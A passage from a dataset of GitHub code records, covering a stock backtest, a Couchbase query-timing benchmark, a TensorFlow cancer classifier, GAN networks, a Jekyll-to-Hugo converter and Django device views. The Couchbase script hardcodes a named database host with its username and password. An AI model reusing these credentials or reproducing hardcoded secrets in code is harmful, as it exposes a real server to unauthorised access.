['04-03-2019','21-03-2019','17-04-2019','19-04-2019','20-04-2019','01-05-2019','05-06-2019','12-08-2019','15-08-2019','02-09-2019','10-09-2019','02-10-2019','08-10-2019','21-10-2019','28-10-2019','12-11-2019','25-12-2019','21-02-2020','10-03-2020','02-Apr-2020','06-Apr-2020','10-04-2020','14-04-2020','01-05-2020','25-05-2020','02-10-2020','16-11-2020','30-11-2020','25-12-2020','26-01-2021','11-03-2021','20-03-2021','02-04-2021','14-04-2021','21-04-2021','13-05-2021','21-07-2021','19-08-2021','10-09-2021','15-10-2021','04-11-2021','05-11-2021','19-11-2021']\r\nstart_date = dt.date(2021, 1, 1)\r\nend_date = dt.date(2021, 4, 14)\r\ndays = end_date - start_date\r\nvalid_date_list = {(start_date + dt.timedelta(days=x)).strftime('%d-%m-%Y')\r\n for x in range(days.days+1)\r\n if (start_date + dt.timedelta(days=x)).isoweekday() <= 5}\r\n\r\nvalid_date_list = list(valid_date_list)\r\nfor d in trading_holidays:\r\n try:\r\n valid_date_list.remove(d)\r\n except:\r\n continue\r\n\r\n\r\nvalid_date_list.sort(key = lambda date: dt.datetime.strptime(date, '%d-%m-%Y'))\r\nprint(\"Trading Days = {}\".format(sorted(valid_date_list)))\r\nnumber_of_trades = int(len(valid_date_list))\r\nprint('Number of possible trading days : ',number_of_trades)\r\n\r\n\r\n\r\nstockCounter = pd.DataFrame()\r\nrisk_reward_ratio = 1.5\r\nTradeBook = pd.DataFrame(columns=['Date','exit_date','Companies','Status','buy_value','sell_value','pct_change_trade','risk_reward_ratio'])\r\n\r\nmodel_pred_result_raw = pd.DataFrame(columns=['Date','Companies','buy_value','pct_change_trade'])\r\nfor i in range(0,int(len(valid_date_list))):\r\n Trade_Date = dt.datetime.strptime(valid_date_list[i], '%d-%m-%Y').strftime('%Y-%m-%d')\r\n day_data = test_data.loc[Trade_Date]\r\n\r\n pred_for_tomorrow = pd.DataFrame({'Date':[],\r\n 'Companies':[],\r\n 'prediction':[]})\r\n\r\n #Predict each stock using the 2nd January Data\r\n for cluster_selected in clusters_df.Cluster.unique():\r\n rf_cv = pickle.load(open(f'./files/clusters/Cluster_{cluster_selected}', 'rb'))\r\n best_rf = rf_cv.best_estimator_\r\n cluster_data = day_data.loc[day_data.symbol.isin(clusters_df.loc[clusters_df.Cluster==cluster_selected,'Companies'].tolist())].copy()\r\n cluster_data = cluster_data.dropna()\r\n if (cluster_data.shape[0]>0):\r\n X_test = cluster_data.loc[:,Target_variables]\r\n \r\n pred_for_tomorrow = pred_for_tomorrow.append(pd.DataFrame({'Date':cluster_data.index,\r\n 'Companies':cluster_data['symbol'],\r\n 'prediction':best_rf.predict_proba(X_test)[:,1]}), ignore_index = True)\r\n top_10_pred = pred_for_tomorrow.sort_values(by = ['prediction'], ascending = False).head(10)\r\n top_10_pred.reset_index(drop=True,inplace = True)\r\n top_10_pred['NIFTY_INDEX'] = top_10_pred.merge(clusters_df[['NIFTY_INDEX','Companies']],how='left', on='Companies')['NIFTY_INDEX']\r\n \r\n #top_10_pred = pred_for_tomorrow[pred_for_tomorrow['prediction'] >= 0.65].copy()\r\n \r\n \r\n \r\n \r\n for selected_company in top_10_pred['Companies']:\r\n actual = all_data[all_data.symbol == selected_company].loc[Trade_Date,'Target_Direction']\r\n pct_change = all_data[all_data.symbol == selected_company].loc[Trade_Date,'Target']\r\n top_10_pred.loc[top_10_pred['Companies'] == selected_company,'actual'] = actual\r\n top_10_pred.loc[top_10_pred['Companies'] == selected_company,'pct_change_trade'] = pct_change\r\n \r\n test_df = top_10_pred \r\n \r\n top_10_pred = get_buy_value(top_10_pred.copy()) \r\n top_10_pred = get_nearest_support_resistance(top_10_pred.copy(),False)\r\n top_10_pred = get_risk_reward(top_10_pred.copy())\r\n top_10_pred = get_index_change(top_10_pred.copy()) \r\n \r\n \r\n #before filtering get the raw predection\r\n model_pred_result_raw = model_pred_result_raw.append(top_10_pred[['Date','Companies','buy_value','pct_change_trade','risk_reward_ratio']])\r\n model_pred_result_raw = model_pred_result_raw[model_pred_result_raw.risk_reward_ratio >= risk_reward_ratio]\r\n \r\n top_10_pred = top_10_pred[top_10_pred.risk_reward_ratio >= risk_reward_ratio] \r\n top_10_pred = top_10_pred[top_10_pred['1WRC'] >= top_10_pred['NIFTY50_1WRC']]\r\n \r\n \r\n #executing the trade not use in production\r\n top_10_pred = execute_trade_with_levels(top_10_pred.copy())\r\n \r\n \r\n try:\r\n \r\n print(top_10_pred[['Date','exit_date','Companies','prediction','Status','buy_value','pct_change_trade','risk_reward_ratio','NIFTY_INDEX','3DRC','1WRC']])\r\n if len(top_10_pred) == 0:\r\n raise Exception(\"Sorry, no trades\")\r\n \r\n TradeBook = TradeBook.append(top_10_pred[['Date','exit_date','Companies','Status','buy_value','sell_value','pct_change_trade','risk_reward_ratio']],ignore_index=True)\r\n except:\r\n continue\r\n \r\nplt.plot(TradeBook['pct_change_trade'])\r\nnet_profit_loss = ((TradeBook.sell_value.sum()-TradeBook.buy_value.sum())/TradeBook.buy_value.sum())*100\r\nplt.ylabel('Returns')\r\nplt.xlabel(f'Trades Net profit/loss: {net_profit_loss} with risk:reward of 1:{risk_reward_ratio}')\r\nplt.title(f'Trades from {start_date} to {end_date}')\r\n\r\n\r\n\r\nprint('----------Trade result with model recomemdadtion and custom filteration-------------')\r\nprint('Number of Trades: ',len(TradeBook))\r\nprint(\"Net Profit/Loss: \",net_profit_loss)\r\nprint(TradeBook.buy_value.sum(),TradeBook.sell_value.sum())\r\n\r\n\r\nmodel_pred_result_raw = model_pred_result_raw.reset_index(drop=True)\r\nmodel_pred_result_raw['sell_value'] = model_pred_result_raw['buy_value'] + ((model_pred_result_raw['pct_change_trade']/100)*model_pred_result_raw['buy_value'])\r\nnet_profit_loss = ((model_pred_result_raw.sell_value.sum()-model_pred_result_raw.buy_value.sum())/model_pred_result_raw.buy_value.sum())*100\r\nprint('----------Trade result with model recomemdadtion (RAW)-------------')\r\nprint('Number of Trades: ',len(model_pred_result_raw))\r\nprint(\"Net Profit/Loss: \",net_profit_loss)\r\nprint(model_pred_result_raw['buy_value'].sum(),model_pred_result_raw['sell_value'].sum())\r\n\r\n#plt.plot(model_pred_result_raw['pct_change_trade'])\r\n#net_profit_loss = ((model_pred_result_raw.sell_value.sum()-model_pred_result_raw.buy_value.sum())/model_pred_result_raw.buy_value.sum())*100\r\n#plt.ylabel('Returns')\r\n#plt.xlabel(f'Trades Net profit/loss: {net_profit_loss} risk:reward of 1:{risk_reward_ratio}')\r\n#plt.title(f'Trades from {start_date} to {end_date}')\r\n\r\nTradeBook.to_csv('./files/clusters/tradebook.csv')\r\n \r\n\r\n","repo_name":"kgsahil/Swing-Trade-Equity","sub_path":"rf_model_test.py","file_name":"rf_model_test.py","file_ext":"py","file_size_in_byte":8878,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"75330182482","text":"\"\"\"\n85. Crie um programa onde o usuário possa digitar sete valores numéricos e cadastre-os em uma lista única que mantenha separados os valores pares e ímpares. No final, mostre os valores pares e ímpares em ordem crescente.\n\n\"\"\"\nnum = [[], []] # adicionando duas listas, a primeira é par e a outra ímpar\nvalor = 0\nfor c in range(1, 8):\n valor = int(input(f'Digite o {c}º valor:'))\n if valor % 2 == 0:\n num[0].append(valor) # adiciona na lista par\n else:\n num[1].append(valor) # adiciona na lista ímpar\nnum[0].sort()\nnum[1].sort()\nprint(f'Os valores pares digitados foram: {num[0]}')\nprint(f'Os valores ímpares digitado foram: {num[1]}')\n","repo_name":"luiz-educosta/Estudando_Python","sub_path":"estudandopython/Exercicios_curso_em_video/curso_python/85.py","file_name":"85.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"18255543164","text":"#!/usr/bin/python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n####\n# Couchbase\n####\n\nimport couchbase\nfrom couchbase.cluster import Cluster\nfrom couchbase.cluster import PasswordAuthenticator\nfrom couchbase.n1ql import N1QLQuery\n\n# login\n\ncluster = Cluster('couchbase://silverhill.fbi.h-da.de')\nauthenticator = PasswordAuthenticator('prak21', 'prak21')\ncluster.authenticate(authenticator)\ncb = cluster.open_bucket('prak21')\ncb.n1ql_timeout = 3600\n\n# analyze functions\n\n\ndef cb_index_create():\n q1 = 'create index movieIds on prak21(movieId);'\n q2 = 'create index titles on prak21(title);'\n query_result(q1)\n query_result(q2)\n\n\ndef cb_index_drop():\n q1 = N1QLQuery('drop index prak21.movieIds;')\n q2 = N1QLQuery('drop index prak21.titles;')\n try:\n cb.n1ql_query(q1).execute()\n except couchbase.exceptions.HTTPError:\n pass\n try:\n cb.n1ql_query(q2).execute()\n except couchbase.exceptions.HTTPError:\n pass\n\n\ndef query_result(string_query):\n q = N1QLQuery(string_query)\n q.timeout = 3600\n qres = cb.n1ql_query(q)\n for row in qres:\n print(row)\n\n\ndef query_time(string_query, repetitions):\n times = []\n q = N1QLQuery(string_query)\n q.timeout = 3600\n for _ in range(repetitions):\n qres = cb.n1ql_query(q).execute()\n time = qres.metrics['executionTime']\n # extract time we get times like 'x.xxs' or 'x.xxms'\n # s is seconds, ms is milliseconds\n format_letter = time[-2]\n if format_letter == 'm':\n times.append(round(float(time[:-2]), 2))\n else:\n times.append(round(float(time[:-1]) * 1000, 2))\n times = np.array(times)\n time_avg = np.round(np.mean(times), 0)\n time_std = np.round(np.std(times), 0)\n return(time_avg, time_std)\n\n####\n# Aufgabe 1\n####\n\n\n# run queries and collect times\nn = 5\nq1 = \"select title from prak21 where title like '%Matrix%';\"\nq2 = \"select ratings from prak21 where movieId = 6365;\"\nq3 = \"select title, ratings from prak21 where movieId = 6365;\"\ncb_index_drop()\nt1, std1 = query_time(q1, n)\nt2, std2 = query_time(q2, n)\nt3, std3 = query_time(q3, n)\ntimes_noidx = np.array([t1, t2, t3])\nstd_noidx = np.array([std1, std2, std3])\ncb_index_create()\nt4, std4 = query_time(q1, n)\nt5, std5 = query_time(q2, n)\nt6, std6 = query_time(q3, n)\ntimes_idx = np.array([t4, t5, t6])\nstd_idx = np.array([std4, std5, std6])\n\n# visualize\nind = np.arange(len(times_noidx)) # the x locations for the groups\nwidth = 0.35 # the width of the bars\n\nfig, ax = plt.subplots()\nrects1 = ax.bar(ind - width/2, times_noidx, width,\n yerr=std_noidx, label='No Index')\nrects2 = ax.bar(ind + width/2, times_idx, width, yerr=std_idx, label='Index')\n\n# Add some text for labels, title and custom x-axis tick labels, etc.\nax.set_ylabel('times in ms')\nax.set_title('times with and without index in ms')\nax.set_xticks(ind)\nax.set_xticklabels(('Q1', 'Q2', 'Q3'))\nax.legend()\n\n\ndef autolabel(rects, xpos='center'):\n ha = {'center': 'center', 'right': 'left', 'left': 'right'}\n offset = {'center': 0, 'right': 1, 'left': -1}\n\n for rect in rects:\n height = rect.get_height()\n ax.annotate('{}'.format(height),\n xy=(rect.get_x() + rect.get_width() / 2, height),\n xytext=(offset[xpos]*3, 3), # use 3 points offset\n textcoords=\"offset points\", # in both directions\n ha=ha[xpos], va='bottom')\n\n\nautolabel(rects1, \"left\")\nautolabel(rects2, \"right\")\n\nfig.tight_layout()\n\nplt.show(block=True)\n","repo_name":"maxneuds/big_data_technologies","sub_path":"praktikum_03/compare_cb.py","file_name":"compare_cb.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"31405406246","text":"\"\"\"updated relationship between user and comments\n\nRevision ID: e0090fc2c42a\nRevises: e5742ca32d04\nCreate Date: 2021-12-14 16:25:24.026791\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'e0090fc2c42a'\ndown_revision = 'e5742ca32d04'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('comments', sa.Column('user_id', sa.Integer(), nullable=False))\n op.create_foreign_key(None, 'comments', 'users', ['user_id'], ['id'])\n op.alter_column('posts', 'createdAt',\n existing_type=postgresql.TIMESTAMP(),\n nullable=True)\n op.alter_column('posts', 'updatedAt',\n existing_type=postgresql.TIMESTAMP(),\n nullable=True)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('posts', 'updatedAt',\n existing_type=postgresql.TIMESTAMP(),\n nullable=False)\n op.alter_column('posts', 'createdAt',\n existing_type=postgresql.TIMESTAMP(),\n nullable=False)\n op.drop_constraint(None, 'comments', type_='foreignkey')\n op.drop_column('comments', 'user_id')\n # ### end Alembic commands ###\n","repo_name":"span9692/Soundbook","sub_path":"migrations/versions/20211214_162524_updated_relationship_between_user_and_.py","file_name":"20211214_162524_updated_relationship_between_user_and_.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"16409667856","text":"# Day_25_02_BreastCancer.py\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn import model_selection, preprocessing\n\n# 문제 1\n# breast-cancer-wisconsin 데이터를\n# x_train, x_test, y_train, y_test로 반환하는 함수를 만드세요\n\n# 문제 2\n# 97.5% 수준의 정확도를 갖는 모델을 구축하세요 (앙상블 적용)\n\n\ndef get_data():\n # 1. Sample code number id number\n # 2. Clump Thickness 1 - 10\n # 3. Uniformity of Cell Size 1 - 10\n # 4. Uniformity of Cell Shape 1 - 10\n # 5. Marginal Adhesion 1 - 10\n # 6. Single Epithelial Cell Size 1 - 10\n # 7. Bare Nuclei 1 - 10\n # 8. Bland Chromatin 1 - 10\n # 9. Normal Nucleoli 1 - 10\n # 10. Mitoses 1 - 10\n # 11. Class: (2 for benign, 4 for malignant)\n names = ['code', 'Clump', 'Size', 'Shape', 'Adhesion',\n 'Epithelial', 'Nuclei', 'Chromatin', 'Nucleoli',\n 'Mitoses', 'Class']\n bc = pd.read_csv('data/breast-cancer-wisconsin.data',\n header=None,\n names=names)\n print(bc)\n bc.info()\n\n counts = bc.Nuclei.value_counts()\n print(counts)\n\n most_freq = counts.index[0]\n\n # print(bc[6])\n # bc.drop([6], axis=1, inplace=True)\n\n enc = preprocessing.LabelEncoder()\n y = enc.fit_transform(bc['Class'])\n y = y.reshape(-1, 1)\n y = np.float32(y) # int -> float\n\n nuclei = bc.Nuclei.values\n print(type(nuclei), nuclei.dtype)\n print(nuclei[:5])\n print(set(nuclei))\n print(np.unique(nuclei))\n\n # 2번\n # equals = (nuclei == '?') # [False True True ... False]\n # nuclei[nuclei == '?'] = '0'\n nuclei[nuclei == '?'] = str(most_freq)\n nuclei = np.int64(nuclei)\n print(np.unique(nuclei))\n\n # 1번\n # temp = [i if i != '?' else '0' for i in nuclei]\n # temp = np.int64(temp)\n # print(np.unique(temp))\n\n # print(bc.Nuclei)\n bc.drop(['code', 'Nuclei', 'Class'], axis=1, inplace=True)\n\n # 1번\n # bc['Nuclei'] = temp\n # bc.info()\n\n x = bc.values\n\n # 2번\n x = np.hstack([x, nuclei.reshape(-1, 1)])\n print(x.shape, y.shape) # (699, 8) (699, 1)\n print(x.dtype)\n\n return model_selection.train_test_split(x, y, train_size=0.7)\n\n\ndef show_accuracy(preds, labels):\n preds = preds.reshape(-1)\n\n bools = np.int32(preds > 0.5)\n y_bools = np.int32(labels.reshape(-1))\n\n print('acc :', np.mean(bools == y_bools))\n\n\ndef model_breast_cancer_missing(x_train, x_test, y_train, y_test):\n name = 'w' + str(np.random.rand(1)[0])\n w = tf.get_variable(name, shape=[x_train.shape[1], 1],\n initializer=tf.glorot_uniform_initializer)\n b = tf.Variable(tf.zeros([1]))\n\n ph_x = tf.placeholder(tf.float32)\n\n z = tf.matmul(ph_x, w) + b\n hx = tf.sigmoid(z)\n\n loss_i = tf.nn.sigmoid_cross_entropy_with_logits(\n labels=y_train, logits=z)\n loss = tf.reduce_mean(loss_i)\n\n # optimizer = tf.train.GradientDescentOptimizer(0.0003)\n optimizer = tf.train.AdamOptimizer(0.1)\n # optimizer = tf.train.RMSPropOptimizer(0.001)\n train = optimizer.minimize(loss)\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n\n for i in range(1000):\n sess.run(train, {ph_x: x_train})\n\n # if i % 10 == 0:\n # print(i, sess.run(loss, {ph_x: x_train}))\n\n preds = sess.run(hx, {ph_x: x_test})\n show_accuracy(preds, y_test)\n\n sess.close()\n\n return preds\n\n\nx_train, x_test, y_train, y_test = get_data()\n\nresults = np.zeros(y_test.shape)\nfor i in range(7):\n preds = model_breast_cancer_missing(x_train, x_test, y_train, y_test)\n results += preds\n\nprint('-' * 30)\nshow_accuracy(results / 7, y_test)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"yunhui21/CB_Ai_NLP","sub_path":"WeedDay/Day_25_02_BreastCancer.py","file_name":"Day_25_02_BreastCancer.py","file_ext":"py","file_size_in_byte":3869,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"20533881538","text":"import torch\nimport torch.nn as nn\nfrom torch.nn import init\nfrom torch.autograd import Variable\n\ndef weights_init_normal(m):\n classname = m.__class__.__name__\n\n if classname.find('Conv') != -1:\n init.normal(m.weight.data, 0.0, 0.02)\n elif classname.find('BatchNorm2d') != -1:\n init.normal(m.weight.data, 1.0, 0.02)\n init.constant(m.bias.data, 0.0)\n\ndef init_weights(net):\n print('Initializing...')\n net.apply(weights_init_normal)\n\nclass ResnetBlock(nn.Module):\n def __init__(self, dim):\n super(ResnetBlock, self).__init__()\n self.conv_block = self.build_conv_block(dim)\n\n def build_conv_block(self, dim):\n conv_block = []\n conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=1),\n nn.BatchNorm2d(dim),\n nn.ReLU(True)]\n conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=1),\n nn.BatchNorm2d(dim)]\n return nn.Sequential(*conv_block)\n\n def forward(self, x):\n out = x + self.conv_block(x)\n return out\n\nclass ResnetGenerator(nn.Module):\n def __init__(self, input_nc, output_nc, ngf=64, n_blocks=6):\n assert (n_blocks >= 0)\n super(ResnetGenerator, self).__init__()\n self.input_nc = input_nc\n self.output_nc = output_nc\n self.ngf = ngf\n\n model = []\n model += [nn.Conv2d(input_nc, ngf, kernel_size=7, padding=3),\n nn.BatchNorm2d(ngf),\n nn.ReLU(True)]\n model += [nn.Conv2d(ngf, ngf * 2, kernel_size=3, stride=2, padding=1),\n nn.BatchNorm2d(ngf * 2),\n nn.ReLU(True)]\n model += [nn.Conv2d(ngf * 2, ngf * 4, kernel_size=3, stride=2, padding=1),\n nn.BatchNorm2d(ngf * 4),\n nn.ReLU(True)]\n\n for i in range(n_blocks):\n model += [ResnetBlock(ngf * 4)]\n\n model += [nn.ConvTranspose2d(ngf * 4, ngf * 2, kernel_size=3, stride=2, padding=1, output_padding=1),\n nn.BatchNorm2d(ngf * 2),\n nn.ReLU(True)]\n model += [nn.ConvTranspose2d(ngf * 2, ngf, kernel_size=3, stride=2, padding=1, output_padding=1),\n nn.BatchNorm2d(ngf),\n nn.ReLU(True)]\n\n model += [nn.Conv2d(ngf, output_nc, kernel_size=7, padding=3)]\n model += [nn.Tanh()]\n\n self.model = nn.Sequential(*model)\n\n def forward(self, x):\n return self.model(x)\n\nclass Discriminator(nn.Module):\n def __init__(self, input_nc, ndf=64):\n super(Discriminator, self).__init__()\n\n model = []\n model += [nn.Conv2d(input_nc, ndf, kernel_size=4, stride=2, padding=1),\n nn.LeakyReLU(0.2, True)]\n\n model += [nn.Conv2d(ndf, ndf * 2, kernel_size=4, stride=2, padding=1),\n nn.BatchNorm2d(ndf * 2),\n nn.LeakyReLU(0.2, True)]\n model += [nn.Conv2d(ndf * 2, ndf * 4, kernel_size=4, stride=2, padding=1),\n nn.BatchNorm2d(ndf * 4),\n nn.LeakyReLU(0.2, True)]\n model += [nn.Conv2d(ndf * 4, ndf * 8, kernel_size=4, stride=1, padding=1),\n nn.BatchNorm2d(ndf * 8),\n nn.LeakyReLU(0.2, True)]\n\n model += [nn.Conv2d(ndf * 8, 1, kernel_size=4, stride=1, padding=1)]\n\n self.model = nn.Sequential(*model)\n\n def forward(self, x):\n #x = torch.cat([x, label], 1)\n return self.model(x)\n\n# GANLoss\nclass GANLoss(nn.Module):\n def __init__(self, target_real_label=1.0, target_fake_label=0.0, tensor=torch.FloatTensor):\n super(GANLoss, self).__init__()\n self.real_label = target_real_label\n self.fake_label = target_fake_label\n self.real_label_var = None\n self.fake_label_var = None\n self.Tensor = tensor\n #self.loss = nn.MSELoss()\n #self.loss = nn.BCELoss()\n self.loss = nn.BCEWithLogitsLoss()\n\n def get_target_tensor(self, input, target_is_real):\n target_tensor = None\n if target_is_real:\n create_label = ((self.real_label_var is None) or\n (self.real_label_var.numel() != input.numel()))\n if create_label:\n real_tensor = self.Tensor(input.size()).fill_(self.real_label)\n self.real_label_var = Variable(real_tensor, requires_grad=False)\n target_tensor = self.real_label_var\n else:\n create_label = ((self.fake_label_var is None) or\n (self.fake_label_var.numel() != input.numel()))\n if create_label:\n fake_tensor = self.Tensor(input.size()).fill_(self.fake_label)\n self.fake_label_var = Variable(fake_tensor, requires_grad=False)\n target_tensor = self.fake_label_var\n return target_tensor\n\n def __call__(self, input, target_is_real):\n target_tensor = self.get_target_tensor(input, target_is_real)\n return self.loss(input, target_tensor)","repo_name":"yangtian62/pix2pix-pytorch","sub_path":"networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":4990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"23441497319","text":"import datetime\n\n\nclass BlobPaths(object):\n\n @staticmethod\n def split_filename(filename: str):\n \"\"\" see test cases for all handled edge cases \"\"\"\n if not filename:\n return '', ''\n\n ext = ''\n name = ''\n parts = filename.split('.')\n if len(parts) == 1:\n return filename, ''\n if parts[0] == '':\n parts.pop(0)\n parts[0] = '.' + parts[0]\n if len(parts) > 1:\n ext = '.' + parts.pop()\n if ext.find('/') > 0:\n ext = ext.lstrip('.')\n parts.append(ext)\n ext = ''\n name = '.'.join(parts)\n if ext == '.':\n name = ''\n return name, ext\n\n @staticmethod\n def get_parts(path_string: str):\n if not path_string:\n raise ValueError('get_parts: path_string must have a value')\n\n parts = str(path_string).split('/')\n bucket = parts.pop(0)\n name, ext = BlobPaths.split_filename(parts.pop())\n path = '/'.join(parts) + '/'\n return bucket, path, name, ext\n\n @staticmethod\n def build_path(path: str, date: datetime.date = None):\n\n if not date:\n date = datetime.datetime.now()\n\n if not path:\n raise ValueError('build_path: path must have a value')\n if not path[0] == '/':\n path_string = path.lstrip('/')\n else:\n path_string = path\n\n path_string = path_string.replace('%date', '%Y-%m-%d')\n path_string = path_string.replace('%time', '%H%M%S')\n\n path_string = date.strftime(path_string)\n\n return path_string\n","repo_name":"joocer/orwell","sub_path":"orwell/helpers/blob_paths.py","file_name":"blob_paths.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"27571236344","text":"\"\"\"\nconvert Jekyll posts to Hugo posts\n\nThis is since `hugo import jekyll` just seems broken, even for Hugo 0.54\n\nUsage example:\n\n python jekyll2hugo.py ~/myJekyllSite/_posts ~/myHugoSite/content/blog\n\"\"\"\nfrom argparse import ArgumentParser\nfrom pathlib import Path\nimport hugomd\n\n\np = ArgumentParser()\np.add_argument(\"jekyll_posts_dir\", help=\"path to Jekyll _posts directory\")\np.add_argument(\"out_dir\", help=\"directory to write converted Hugo posts\")\np.add_argument(\"-nofix\", help=\"do not fix bad characters (Hugo might fail)\", action=\"store_true\")\np.add_argument(\"-v\", \"--verbose\", action=\"store_true\")\np = p.parse_args()\n\ninpath = Path(p.jekyll_posts_dir).expanduser()\nif not inpath.is_dir():\n raise NotADirectoryError(inpath)\n\noutdir = Path(p.out_dir).expanduser()\noutdir.mkdir(parents=True, exist_ok=True)\n\njlist = inpath.rglob(\"*.md\")\nfor jfn in jlist:\n hfn = hugomd.post2hugo(jfn, outdir, not p.nofix)\n if p.verbose and hfn:\n print(jfn, \"=>\", hfn)\n","repo_name":"scivision/hugo-utils","sub_path":"src/hugomd/jekyll2hugo/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"23183633921","text":"'''\nConsider the fraction, n/d, where n and d are positive integers. If n= ageMin) and (ageMax is None or frame.age <= ageMax):\n # get list of balls\n balls = frame.data[self.agent][\"BALLS\"].value\n t = frame.age\n (x, y, z, vx, vy, vz, conf) = (None, None, None, None, None, None, None)\n if len(balls) > 0:\n ball = balls[0]\n x = ball[0][0]\n y = ball[0][1]\n z = ball[0][2]\n vx = ball[1][0]\n vy = ball[1][1]\n vz = ball[1][2]\n conf = ball[2]\n # TODO compress\n result.insert('x', t, x)\n result.insert('y', t, y)\n result.insert('z', t, z)\n result.insert('vx', t, vx)\n result.insert('vy', t, vy)\n result.insert('vz', t, vz)\n result.insert('conf', t, conf)\n return result\n \n def obstacleStatsBetweenAge(self, ageMin = None, ageMax = None):\n result = defaultdict(lambda: MultiSeries())\n for frame in self.rdl.frames:\n if (ageMin is None or frame.age >= ageMin) and (ageMax is None or frame.age <= ageMax):\n for obst in frame.data[self.agent][\"OBSTACLES\"].value:\n t = frame.age\n ((x, y), (vx, vy), conf, id) = obst\n result[id].insert('x', t, x)\n result[id].insert('y', t, y)\n result[id].insert('vx', t, vx)\n result[id].insert('vy', t, vy)\n result[id].insert('conf', t, conf)\n return result\n\n def obstacleStatsBetweenAge(self, ageMin = None, ageMax = None):\n result = defaultdict(lambda: MultiSeries())\n for frame in self.rdl.frames:\n if (ageMin is None or frame.age >= ageMin) and (ageMax is None or frame.age <= ageMax):\n for obst in frame.data[self.agent][\"OBSTACLES\"].value:\n t = frame.age\n ((x, y), (vx, vy), conf, id) = obst\n result[id].insert('x', t, x)\n result[id].insert('y', t, y)\n result[id].insert('vx', t, vx)\n result[id].insert('vy', t, vy)\n result[id].insert('conf', t, conf)\n return result\n\n def framesBetweenAge(self, ageMin, ageMax):\n return [frame for frame in self.rdl.frames if frame.age >= ageMin and frame.age <= ageMax]\n \n\n","repo_name":"Falcons-Robocup/code","sub_path":"packages/worldModel/tst/WorldModelAnalyzer.py","file_name":"WorldModelAnalyzer.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"}
+{"seq_id":"25785520120","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.utils.dateformat import DateFormat\nfrom .forms import FormCadastroDispositivo\nfrom .models import CadastroDispositivo, QRCode\nfrom django.http import HttpResponse\nfrom django.core.files.storage import default_storage\nfrom django.core.files.base import ContentFile\nfrom io import BytesIO\nfrom django.urls import reverse\nfrom departamento.models import Sala\nfrom falha.models import Manutencao, Falha\nfrom falha.forms import FormManutencao, FalhaForm\nimport qrcode\nimport base64\nimport random\nimport string\nfrom django.contrib.auth.decorators import login_required\nfrom home.decorator import user_has_permission\n\ndef gerar_protocolo(length=6):\n caracteres_permitidos = string.ascii_uppercase + string.digits\n protocolo = ''.join(random.choice(caracteres_permitidos) for _ in range(length))\n return protocolo\n\n@login_required\n@user_has_permission('dispositivo.add_cadastrodispositivo')\ndef cadastro_dispositivo(request):\n salas = Sala.objects.all()\n if request.method == 'POST':\n form = FormCadastroDispositivo(request.POST)\n if form.is_valid():\n novo_dispositivo = form.save()\n \n ip = request.META.get('REMOTE_ADDR')\n porta = request.META.get('SERVER_PORT')\n custom_domain = f\"http://{ip}:{porta}\"\n \n qr = qrcode.QRCode(version=1, error_correction=qrcode.constants.ERROR_CORRECT_L, box_size=10, border=4)\n detalhes_url = reverse('detalhes_dispositivo', args=[novo_dispositivo.id])\n full_url = f\"{custom_domain}{detalhes_url}\"\n qr.add_data(full_url)\n qr.make(fit=True)\n print(full_url)\n \n img = qr.make_image(fill_color=\"black\", back_color=\"white\")\n buffer = BytesIO()\n img.save(buffer, format=\"PNG\")\n \n qr_code_base64 = base64.b64encode(buffer.getvalue()).decode('utf-8')\n \n file_name = f'qrcodes/qrcode_{novo_dispositivo.id}.png'\n default_storage.save(file_name, ContentFile(buffer.getvalue()))\n novo_dispositivo.qr_code = file_name\n novo_dispositivo.save()\n qr_code_obj = QRCode(dispositivo=novo_dispositivo, qr_code_base64=qr_code_base64)\n qr_code_obj.save()\n \n print(\"Novo dispositivo salvo com sucesso:\", novo_dispositivo)\n return render(request, 'dispositivo/popup_qr_code.html', {'dispositivo': novo_dispositivo})\n else:\n print(\"Erros no formulário:\", form.errors)\n else:\n form = FormCadastroDispositivo()\n return render(request, 'dispositivo/cadastro_dispositivo.html', {'form': form, 'salas': salas})\n\n@login_required\n@user_has_permission('dispositivo.change_cadastrodispositivo')\ndef editar_dispositivo(request, dispositivo_id):\n dispositivo = get_object_or_404(CadastroDispositivo, pk=dispositivo_id)\n if request.method == 'POST':\n form = FormCadastroDispositivo(request.POST, instance=dispositivo)\n if form.is_valid():\n form.save()\n return redirect('listar_dispositivos_e_falhas')\n else:\n df = DateFormat(dispositivo.data_aquisicao)\n dispositivo.data_aquisicao = df.format('Y-m-d')\n form = dispositivo\n return render(request, 'dispositivo/editar_dispositivo.html', {'form': form})\n\n@login_required\n@user_has_permission('dispositivo.delete_cadastrodispositivo')\ndef 